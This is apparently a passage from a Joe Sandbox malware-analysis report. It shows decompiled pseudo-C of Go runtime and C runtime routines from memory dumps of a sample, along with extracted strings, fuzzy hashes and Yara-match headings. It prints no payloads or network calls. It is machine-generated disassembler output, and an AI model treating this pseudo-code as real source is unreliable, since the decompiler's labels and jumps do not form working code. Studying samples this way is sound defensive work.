                                                                                                                            										_v40 = _t174;
                                                                                                                            										_t180 = _t180 - _t185;
                                                                                                                            										_t209 = _t180 - 1;
                                                                                                                            										_v104 = _t209;
                                                                                                                            										_t208 = _t208 &  ~_t209 >> 0x0000003f;
                                                                                                                            										_t212 = _t152 + _t208;
                                                                                                                            										_v48 = _t212;
                                                                                                                            										if(_t180 != 3) {
                                                                                                                            											L21:
                                                                                                                            											if(_t180 != 4) {
                                                                                                                            												L28:
                                                                                                                            												E01332340(_t185, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, 0x1388720, _t174, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, _v48, _v104, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, 0x138c5b1, _v104, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, _v40, _v64, _t199, _t215);
                                                                                                                            												_t121 = 2;
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v64, _t199, _t215);
                                                                                                                            												_t92 = L013323C0(_t185, _t199, _t215);
                                                                                                                            												_t197 = _v16;
                                                                                                                            												_t204 = _v56;
                                                                                                                            												goto L2;
                                                                                                                            											}
                                                                                                                            											L22:
                                                                                                                            											r13d =  *(_t152 + _t208) & 0x0000ffff;
                                                                                                                            											if (r13w != 0x666f) goto L28;
                                                                                                                            											r10d =  *(_t152 + _t208 + 2) & 0x000000ff;
                                                                                                                            											if(r10b != 0x66) {
                                                                                                                            												goto L28;
                                                                                                                            											}
                                                                                                                            											L23:
                                                                                                                            											L24:
                                                                                                                            											r10b = _t144 == 0;
                                                                                                                            											if(_t185 != 7) {
                                                                                                                            												L27:
                                                                                                                            												_v105 = r10b;
                                                                                                                            												_t185 =  *0x147b4e8; // 0xf
                                                                                                                            												_v72 = _t185;
                                                                                                                            												_t92 = 0;
                                                                                                                            												L50:
                                                                                                                            												while(_t152 < _t185) {
                                                                                                                            													_t194 =  *0x147b4e0; // 0xc000000000
                                                                                                                            													_t180 =  *0x147b4e8; // 0xf
                                                                                                                            													asm("o16 nop [eax+eax]");
                                                                                                                            													if(_t152 >= _t180) {
                                                                                                                            														L61:
                                                                                                                            														E013588C0();
                                                                                                                            														L62:
                                                                                                                            														 *(_t206 + _t152 + 0x19) = r10b;
                                                                                                                            														_t85 = _t212 + 1; // 0x2
                                                                                                                            														_t152 = _t85;
                                                                                                                            														L63:
                                                                                                                            														if(_t152 >= _t194) {
                                                                                                                            															goto L2;
                                                                                                                            														}
                                                                                                                            														L64:
                                                                                                                            														_t184 =  *0x147b4e8; // 0xf
                                                                                                                            														_t207 =  *0x147b4e0; // 0xc000000000
                                                                                                                            														if(_t152 >= _t184) {
                                                                                                                            															L67:
                                                                                                                            															E013588C0();
                                                                                                                            															goto L68;
                                                                                                                            														}
                                                                                                                            														L65:
                                                                                                                            														_t212 = _t152;
                                                                                                                            														_t152 = _t152 << 5;
                                                                                                                            														 *((char*)(_t207 + _t152 + 0x18)) = 1;
                                                                                                                            														_t180 =  *0x147b4e8; // 0xf
                                                                                                                            														_t206 =  *0x147b4e0; // 0xc000000000
                                                                                                                            														if(_t212 < _t180) {
                                                                                                                            															goto L62;
                                                                                                                            														}
                                                                                                                            														L66:
                                                                                                                            														E013588C0();
                                                                                                                            														goto L67;
                                                                                                                            													}
                                                                                                                            													L52:
                                                                                                                            													_t212 = _t152;
                                                                                                                            													_t172 = _t152 << 5;
                                                                                                                            													_t59 = _t172 + 8; // 0x3
                                                                                                                            													_t180 =  *((intOrPtr*)(_t194 + _t59));
                                                                                                                            													_t194 =  *((intOrPtr*)(_t194 + _t172));
                                                                                                                            													if(_t180 != _t206) {
                                                                                                                            														L49:
                                                                                                                            														_t57 = _t212 + 1; // 0x1
                                                                                                                            														_t152 = _t57;
                                                                                                                            														continue;
                                                                                                                            													}
                                                                                                                            													L53:
                                                                                                                            													_v80 = _t172;
                                                                                                                            													_v88 = _t212;
                                                                                                                            													_t92 = E013021C0(_t92, _t121, 0, 0, _t194, _t174, _t180);
                                                                                                                            													if(_t92 != 0) {
                                                                                                                            														L55:
                                                                                                                            														_t180 =  *0x147b4e8; // 0xf
                                                                                                                            														_t197 =  *0x147b4e0; // 0xc000000000
                                                                                                                            														_t152 = _v88;
                                                                                                                            														if(_t152 >= _t180) {
                                                                                                                            															L60:
                                                                                                                            															E013588C0();
                                                                                                                            															goto L61;
                                                                                                                            														}
                                                                                                                            														L56:
                                                                                                                            														_t194 = _v80;
                                                                                                                            														 *((char*)(_t197 + _t194 + 0x18)) = 1;
                                                                                                                            														_t180 =  *0x147b4e8; // 0xf
                                                                                                                            														_t197 =  *0x147b4e0; // 0xc000000000
                                                                                                                            														if(_t152 >= _t180) {
                                                                                                                            															L59:
                                                                                                                            															E013588C0();
                                                                                                                            															goto L60;
                                                                                                                            														}
                                                                                                                            														L57:
                                                                                                                            														r9d = _v105 & 0x000000ff;
                                                                                                                            														 *((intOrPtr*)(_t197 + _t194 + 0x19)) = r9b;
                                                                                                                            														_t197 = _v16;
                                                                                                                            														_t204 = _v56;
                                                                                                                            														goto L2;
                                                                                                                            													}
                                                                                                                            													L54:
                                                                                                                            													_t185 = _v72;
                                                                                                                            													_t174 = _v40;
                                                                                                                            													_t197 = _v16;
                                                                                                                            													_t204 = _v56;
                                                                                                                            													_t206 = _v64;
                                                                                                                            													r10d = _v105 & 0x000000ff;
                                                                                                                            													_t212 = _v88;
                                                                                                                            													goto L49;
                                                                                                                            												}
                                                                                                                            												E01332340(_t185, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, 0x138c010, _t174, _t199, _t215);
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, _v40, _v64, _t199, _t215);
                                                                                                                            												_t121 = 2;
                                                                                                                            												E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v64, _t199, _t215);
                                                                                                                            												_t92 = L013323C0(_t185, _t199, _t215);
                                                                                                                            												_t197 = _v16;
                                                                                                                            												_t204 = _v56;
                                                                                                                            												goto L2;
                                                                                                                            											}
                                                                                                                            											L25:
                                                                                                                            											r11d =  *(_t152 + _t193) & 0x0000ffff;
                                                                                                                            											if (r11w != 0x6c61) goto L27;
                                                                                                                            											_t126 =  *(_t152 + _t193 + 2) & 0x000000ff;
                                                                                                                            											if(dil != 0x6c) {
                                                                                                                            												goto L27;
                                                                                                                            											}
                                                                                                                            											L26:
                                                                                                                            											_t194 =  *0x147b4e8; // 0xf
                                                                                                                            											_t92 = 0;
                                                                                                                            											goto L63;
                                                                                                                            										}
                                                                                                                            										L20:
                                                                                                                            										r10d =  *(_t152 + _t208) & 0x0000ffff;
                                                                                                                            										if (r10w != 0x6e6f) goto L28;
                                                                                                                            										_t144 = _t180 - 3;
                                                                                                                            										goto L24;
                                                                                                                            									}
                                                                                                                            									_t185 = 0xffffffff;
                                                                                                                            									goto L15;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							L7:
                                                                                                                            							r8d = 0;
                                                                                                                            							_t127 = 0;
                                                                                                                            							_t180 = _t174;
                                                                                                                            							goto L11;
                                                                                                                            						}
                                                                                                                            						_t180 = 0xffffffff;
                                                                                                                            						goto L6;
                                                                                                                            					}
                                                                                                                            					_t154 =  *0x147b4e8; // 0xf
                                                                                                                            					_t181 =  *0x147b4e0; // 0xc000000000
                                                                                                                            					if(_t154 == 0) {
                                                                                                                            						L32:
                                                                                                                            						return _t92;
                                                                                                                            					}
                                                                                                                            					L31:
                                                                                                                            					_v56 = _t154;
                                                                                                                            					while(1) {
                                                                                                                            						L34:
                                                                                                                            						_t42 = _t181 + 0x19; // 0xf000000000000000
                                                                                                                            						_t114 =  *_t42 & 0x000000ff;
                                                                                                                            						_t43 = _t181 + 0x10; // 0x14cfae1
                                                                                                                            						_t196 =  *_t43;
                                                                                                                            						_t187 =  *_t181;
                                                                                                                            						_t44 = _t181 + 8; // 0x3
                                                                                                                            						_t205 =  *_t44;
                                                                                                                            						if( *((char*)(_t181 + 0x18)) != 0) {
                                                                                                                            							if(_t114 == 0 ||  *_t196 != 0) {
                                                                                                                            								 *_t196 = _t114;
                                                                                                                            							} else {
                                                                                                                            								_v64 = _t205;
                                                                                                                            								_v16 = _t187;
                                                                                                                            								_v72 = _t185;
                                                                                                                            								_v24 = _t181;
                                                                                                                            								E01332340(_t185, _t199, _t215);
                                                                                                                            								E01332C40(0, _t126, _t127, _t128, 0x138acee, _t174, _t199, _t215);
                                                                                                                            								_t174 = _v64;
                                                                                                                            								E01332C40(0, _t126, _t127, _t128, _v16, _v64, _t199, _t215);
                                                                                                                            								E01332C40(0, _t126, _t127, _t128, 0x138a600, _v64, _t199, _t215);
                                                                                                                            								_t92 = L013323C0(_t185, _t199, _t215);
                                                                                                                            								_t154 = _v56;
                                                                                                                            								_t181 = _v24;
                                                                                                                            								_t185 = _v72;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						_t185 = _t185 + 1;
                                                                                                                            						if(_t154 <= _t185) {
                                                                                                                            							break;
                                                                                                                            						}
                                                                                                                            						L33:
                                                                                                                            						_t181 = _t181 + 0x20;
                                                                                                                            					}
                                                                                                                            					L40:
                                                                                                                            					goto L32;
                                                                                                                            					L73:
                                                                                                                            					_a8 = _t152;
                                                                                                                            					_a16 = _t174;
                                                                                                                            					E01356200(_t185, _t199);
                                                                                                                            				}
                                                                                                                            			}














































                                                                                                                            0x013012f9
                                                                                                                            0x013012fe
                                                                                                                            0x01301303
                                                                                                                            0x01301314
                                                                                                                            0x01301323
                                                                                                                            0x01301334
                                                                                                                            0x01301339
                                                                                                                            0x0130133e
                                                                                                                            0x01301343
                                                                                                                            0x00000000
                                                                                                                            0x01301343
                                                                                                                            0x013011a0
                                                                                                                            0x013011a3
                                                                                                                            0x013015f2
                                                                                                                            0x01301600
                                                                                                                            0x00000000
                                                                                                                            0x01301600
                                                                                                                            0x013011a9
                                                                                                                            0x013011ad
                                                                                                                            0x013015e5
                                                                                                                            0x013015ea
                                                                                                                            0x013015ed
                                                                                                                            0x00000000
                                                                                                                            0x013015ed
                                                                                                                            0x013011b3
                                                                                                                            0x013011b3
                                                                                                                            0x013011b3
                                                                                                                            0x013011b7
                                                                                                                            0x013011bd
                                                                                                                            0x013011c1
                                                                                                                            0x013011c4
                                                                                                                            0x013011c8
                                                                                                                            0x013011c8
                                                                                                                            0x013011cf
                                                                                                                            0x013015dc
                                                                                                                            0x013015e0
                                                                                                                            0x00000000
                                                                                                                            0x013015e0
                                                                                                                            0x013011d5
                                                                                                                            0x013011d5
                                                                                                                            0x013011da
                                                                                                                            0x013011df
                                                                                                                            0x013011e2
                                                                                                                            0x013011e6
                                                                                                                            0x013011f5
                                                                                                                            0x013011f8
                                                                                                                            0x013011fc
                                                                                                                            0x01301205
                                                                                                                            0x01301220
                                                                                                                            0x01301224
                                                                                                                            0x0130128c
                                                                                                                            0x0130128c
                                                                                                                            0x013012a0
                                                                                                                            0x013012af
                                                                                                                            0x013012c0
                                                                                                                            0x013012cf
                                                                                                                            0x013012db
                                                                                                                            0x013012e0
                                                                                                                            0x013012e5
                                                                                                                            0x013012ea
                                                                                                                            0x013012ef
                                                                                                                            0x00000000
                                                                                                                            0x013012ef
                                                                                                                            0x01301226
                                                                                                                            0x01301226
                                                                                                                            0x01301231
                                                                                                                            0x01301233
                                                                                                                            0x0130123d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130123f
                                                                                                                            0x01301243
                                                                                                                            0x01301243
                                                                                                                            0x0130124b
                                                                                                                            0x01301274
                                                                                                                            0x01301274
                                                                                                                            0x01301279
                                                                                                                            0x01301280
                                                                                                                            0x01301285
                                                                                                                            0x00000000
                                                                                                                            0x01301460
                                                                                                                            0x01301469
                                                                                                                            0x01301470
                                                                                                                            0x01301477
                                                                                                                            0x01301483
                                                                                                                            0x01301585
                                                                                                                            0x01301585
                                                                                                                            0x0130158a
                                                                                                                            0x0130158a
                                                                                                                            0x0130158f
                                                                                                                            0x0130158f
                                                                                                                            0x01301593
                                                                                                                            0x01301596
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130159c
                                                                                                                            0x0130159c
                                                                                                                            0x013015a3
                                                                                                                            0x013015ad
                                                                                                                            0x013015d7
                                                                                                                            0x013015d7
                                                                                                                            0x00000000
                                                                                                                            0x013015d7
                                                                                                                            0x013015af
                                                                                                                            0x013015af
                                                                                                                            0x013015b2
                                                                                                                            0x013015b6
                                                                                                                            0x013015bc
                                                                                                                            0x013015c3
                                                                                                                            0x013015cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013015cf
                                                                                                                            0x013015d2
                                                                                                                            0x00000000
                                                                                                                            0x013015d2
                                                                                                                            0x01301489
                                                                                                                            0x01301489
                                                                                                                            0x0130148c
                                                                                                                            0x01301490
                                                                                                                            0x01301490
                                                                                                                            0x01301495
                                                                                                                            0x0130149c
                                                                                                                            0x01301458
                                                                                                                            0x01301458
                                                                                                                            0x01301458
                                                                                                                            0x00000000
                                                                                                                            0x01301458
                                                                                                                            0x0130149e
                                                                                                                            0x0130149e
                                                                                                                            0x013014a3
                                                                                                                            0x013014ab
                                                                                                                            0x013014b2
                                                                                                                            0x013014dd
                                                                                                                            0x013014dd
                                                                                                                            0x013014e4
                                                                                                                            0x013014eb
                                                                                                                            0x013014f3
                                                                                                                            0x01301580
                                                                                                                            0x01301580
                                                                                                                            0x00000000
                                                                                                                            0x01301580
                                                                                                                            0x013014f9
                                                                                                                            0x013014f9
                                                                                                                            0x013014fe
                                                                                                                            0x01301503
                                                                                                                            0x0130150a
                                                                                                                            0x01301514
                                                                                                                            0x0130157a
                                                                                                                            0x0130157a
                                                                                                                            0x00000000
                                                                                                                            0x0130157a
                                                                                                                            0x01301516
                                                                                                                            0x01301516
                                                                                                                            0x0130151c
                                                                                                                            0x01301521
                                                                                                                            0x01301526
                                                                                                                            0x00000000
                                                                                                                            0x01301526
                                                                                                                            0x013014b4
                                                                                                                            0x013014b4
                                                                                                                            0x013014b9
                                                                                                                            0x013014be
                                                                                                                            0x013014c3
                                                                                                                            0x013014c8
                                                                                                                            0x013014cd
                                                                                                                            0x013014d3
                                                                                                                            0x00000000
                                                                                                                            0x013014d3
                                                                                                                            0x01301530
                                                                                                                            0x01301541
                                                                                                                            0x01301550
                                                                                                                            0x0130155c
                                                                                                                            0x01301561
                                                                                                                            0x01301566
                                                                                                                            0x0130156b
                                                                                                                            0x01301570
                                                                                                                            0x00000000
                                                                                                                            0x01301570
                                                                                                                            0x0130124d
                                                                                                                            0x0130124d
                                                                                                                            0x01301258
                                                                                                                            0x0130125a
                                                                                                                            0x01301264
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01301266
                                                                                                                            0x01301266
                                                                                                                            0x0130126d
                                                                                                                            0x00000000
                                                                                                                            0x0130126d
                                                                                                                            0x01301207
                                                                                                                            0x01301207
                                                                                                                            0x01301212
                                                                                                                            0x01301214
                                                                                                                            0x00000000
                                                                                                                            0x01301214
                                                                                                                            0x01301185
                                                                                                                            0x00000000
                                                                                                                            0x01301185
                                                                                                                            0x01301171
                                                                                                                            0x01301132
                                                                                                                            0x01301132
                                                                                                                            0x01301135
                                                                                                                            0x01301137
                                                                                                                            0x00000000
                                                                                                                            0x01301137
                                                                                                                            0x01301126

                                                                                                                            Strings
                                                                                                                            • " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf, xrefs: 013012D4, 01301328, 01301555
                                                                                                                            • GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detected between assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl , xrefs: 01301535
                                                                                                                            • cpu., xrefs: 01301173
                                                                                                                            • GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealand Standard TimeNorth Korea Standard TimeTransbaikal Standard TimeUS Mountain Standard TimeUlaanbaatar Standard TimeUpdateProc, xrefs: 013013BB
                                                                                                                            • " not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt, xrefs: 013012B4
                                                                                                                            • GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRegQueryInfoKeyWRegQueryValueExWRemoveDirectoryWSetFilePointerExTerminateProcessZanabazar_Squarerun, xrefs: 01301291
                                                                                                                            • GODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected s, xrefs: 01301308
                                                                                                                            • ", missing CPU supportchan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over markroot jobsmakecha, xrefs: 013013DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf$" not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt$", missing CPU supportchan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over markroot jobsmakecha$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealand Standard TimeNorth Korea Standard TimeTransbaikal Standard TimeUS Mountain Standard TimeUlaanbaatar Standard TimeUpdateProc$GODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected s$GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detected between assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl $GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRegQueryInfoKeyWRegQueryValueExWRemoveDirectoryWSetFilePointerExTerminateProcessZanabazar_Squarerun$cpu.
                                                                                                                            • API String ID: 0-665398544
                                                                                                                            • Opcode ID: ce62b8b79b2730c21a49227175eeb11c328e4f670fb8375f3d0da92049fce42b
                                                                                                                            • Instruction ID: 654b61529c6d19a43a80fa1b97721dc917999fbe8a492eeb7968d536d2aff3b3
                                                                                                                            • Opcode Fuzzy Hash: ce62b8b79b2730c21a49227175eeb11c328e4f670fb8375f3d0da92049fce42b
                                                                                                                            • Instruction Fuzzy Hash: 01C1B276308B85C1DF16DB69E45039AABA5F389BD8F484522EF8E07BA5DF78C481C710
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2328795619-0
                                                                                                                            • Opcode ID: 8ae9ed08b13ba4ada5ec926fa5856a0368a7c2d79885a6854ff75b2d8ccebf79
                                                                                                                            • Instruction ID: 0ad4f945ed8539983ad086ff95364435bcd9f04e25b16c6f0d02187b61245009
                                                                                                                            • Opcode Fuzzy Hash: 8ae9ed08b13ba4ada5ec926fa5856a0368a7c2d79885a6854ff75b2d8ccebf79
                                                                                                                            • Instruction Fuzzy Hash: 9161B132218E254AEA69962C8C4E37672C1E796732F34032EF456C3AF1DB72D85346D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A7AA10(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
                                                                                                                            				void* _t5;
                                                                                                                            
                                                                                                                            				_a24 = __rbx;
                                                                                                                            				_a32 = __r9;
                                                                                                                            				_a16 = __rcx;
                                                                                                                            				if (__r8 == 0) goto 0xf8a7aa5c;
                                                                                                                            				if (__r9 == 0) goto 0xf8a7aa5c;
                                                                                                                            				if (__rcx != 0) goto 0xf8a7aa73;
                                                                                                                            				_t5 = E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t5);
                                                                                                                            				return 0;
                                                                                                                            			}





                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2328795619-0
                                                                                                                            • Opcode ID: fe6c69e06a5171c637e28ec553544637b132a332b2738a7bcf0611f9cb5f9797
                                                                                                                            • Instruction ID: 838435a5375285df8fb05ac5d9547276a0291542d96aed56dbe7a580ec424867
                                                                                                                            • Opcode Fuzzy Hash: fe6c69e06a5171c637e28ec553544637b132a332b2738a7bcf0611f9cb5f9797
                                                                                                                            • Instruction Fuzzy Hash: 0D512863704E4066FE268A665D0A76D6691E380BF1F344710BB3943FC4EB34E891E728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1547050394-0
                                                                                                                            • Opcode ID: 271e1aa9dde04d657ce96203ddd2593fe8d93db4ce24f7b2a5438f8da3e95bbd
                                                                                                                            • Instruction ID: ff3c0a168232e4902c71c00facd6982d8c72ca5921cfdb40af41b53246a98ed6
                                                                                                                            • Opcode Fuzzy Hash: 271e1aa9dde04d657ce96203ddd2593fe8d93db4ce24f7b2a5438f8da3e95bbd
                                                                                                                            • Instruction Fuzzy Hash: 36210832608E594FFF92EB284C0D36A72D1EB9A321F240559B445D36A2DB38CC428369
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0000025B25BF8A7A52C(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r9, void* _a8, void* _a16, void* _a32) {
                                                                                                                            				void* _t8;
                                                                                                                            				intOrPtr* _t15;
                                                                                                                            				intOrPtr* _t27;
                                                                                                                            
                                                                                                                            				r8d = 0x40;
                                                                                                                            				goto 0xf8a7a454;
                                                                                                                            				asm("int3");
                                                                                                                            				_t15 = _t27;
                                                                                                                            				 *((long long*)(_t15 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t15 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t15 + 0x20)) = __rsi;
                                                                                                                            				 *((long long*)(_t15 + 0x18)) = __r8;
                                                                                                                            				if (__rdx == 0) goto 0xf8a7a580;
                                                                                                                            				if (__r8 == 0) goto 0xf8a7a580;
                                                                                                                            				if (__r9 != 0) goto 0xf8a7a59f;
                                                                                                                            				_t8 = E0000025B25BF8A7B89C(_t15);
                                                                                                                            				 *_t15 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t8);
                                                                                                                            				return 0;
                                                                                                                            			}







                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1547050394-0
                                                                                                                            • Opcode ID: c2a2d518c0411f4a1b6f29b9841f12473f55a72886990cbb50f9ee093eae4808
                                                                                                                            • Instruction ID: 0a448a856be8fa8772657f85989b41e974b922cbe25fce5920d2ea7df9591bd7
                                                                                                                            • Opcode Fuzzy Hash: c2a2d518c0411f4a1b6f29b9841f12473f55a72886990cbb50f9ee093eae4808
                                                                                                                            • Instruction Fuzzy Hash: 6321D863604E8155FF639B21AC0E31D6291F7447E1F244420BE4987F86EB3DD442AB38
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0000025B25BF8A84434(signed int __ebx, signed int __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, signed int _a8, long long _a24) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* _t16;
                                                                                                                            				void* _t20;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t38;
                                                                                                                            				intOrPtr* _t45;
                                                                                                                            				signed long long _t48;
                                                                                                                            				signed long long _t53;
                                                                                                                            
                                                                                                                            				_t34 = __edx;
                                                                                                                            				_a24 = __rbx;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				if (__edi != 0xfffffffe) goto 0xf8a8445d;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a844fa;
                                                                                                                            				if (__ecx < 0) goto 0xf8a844ea;
                                                                                                                            				_t38 = __edi -  *0xf8aa7384;
                                                                                                                            				if (_t38 >= 0) goto 0xf8a844ea;
                                                                                                                            				_t53 = __ecx >> 5;
                                                                                                                            				_t48 = __ecx * 0x58;
                                                                                                                            				if (_t38 == 0) goto 0xf8a844ea;
